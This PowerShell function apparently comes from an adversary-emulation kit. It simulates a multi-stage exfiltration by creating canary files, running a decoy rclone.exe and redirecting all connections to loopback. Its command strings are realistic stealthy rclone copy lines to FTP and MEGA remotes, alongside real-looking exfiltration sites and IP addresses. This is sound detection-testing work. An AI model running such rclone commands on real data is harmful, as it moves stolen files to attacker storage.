function Invoke-CobaltSocksExfiltration{param($Paths);$t=Get-CobaltSocksTimeline
foreach($n in @('customers.csv','domain-archive.zip','contracts.7z')){Write-CobaltSocksFile(Join-Path $Paths.Collection $n)"Generated collection canary: $n" 'generated collection data' $t.ExfilStart}
$rclone=Join-Path $Paths.FileServer 'Users\Public\Music\rclone.exe';New-CobaltSocksDecoy $rclone 'Rclone process-name canary'
foreach($c in @('rclone.exe copy E:\CANARY\customers ftp1:canary/customers -q --ignore-existing --multi-thread-streams 12 --transfers 12 --no-console','rclone.exe copy E:\CANARY\domain mega:canary/domain -q --ignore-existing --multi-thread-streams 12 --transfers 12 --no-console','rclone.exe copy E:\CANARY ftp2:canary -q --transfers 12 --no-console')){Invoke-CobaltSocksDecoy $rclone $c}
Invoke-CobaltSocksLoopback 443 'qaz.im, temp.sh, and MEGA';Invoke-CobaltSocksLoopback 21 '93.115.26.127:21 failed FTP';Invoke-CobaltSocksLoopback 21 '46.21.250.52:21 successful second FTP'
Write-CobaltSocksFile (Join-Path $Paths.Evidence 'exfiltration-sequence.json') (@(
@{time=$t.ExfilStart.ToString('o');sites=@('qaz.im','temp.sh');downloadsObserved=$false;actualConnection='127.0.0.1'},@{time=$t.FTPFailed.ToString('o');destination='93.115.26.127:21';result='reported failed';bytesTransferred=0},@{time=$t.Mega.ToString('o');destination='MEGA';reportedDurationMinutes=40;actualBytes=0},@{time=$t.FTPSecond.ToString('o');destination='46.21.250.52:21';reportedDurationHours=16;reportedVolume='several GB';actualBytes=0}
)|ConvertTo-Json -Depth 6) 'multi-stage exfiltration record' $t.ExfilStart
Add-CobaltSocksTimeline $t.FTPFailed 'Exfiltration' 'Initial FTP Rclone attempt failed; connection redirected to loopback.' @{reported='93.115.26.127:21';bytes=0};Add-CobaltSocksTimeline $t.Mega 'Exfiltration' 'MEGA transfer is represented as a 40-minute zero-byte metadata event.' @{cloudAccess=$false};Add-CobaltSocksTimeline $t.FTPSecond 'Exfiltration' 'Day-two 16-hour FTP transfer is recorded without sending data.' @{reported='46.21.250.52:21';bytes=0}}
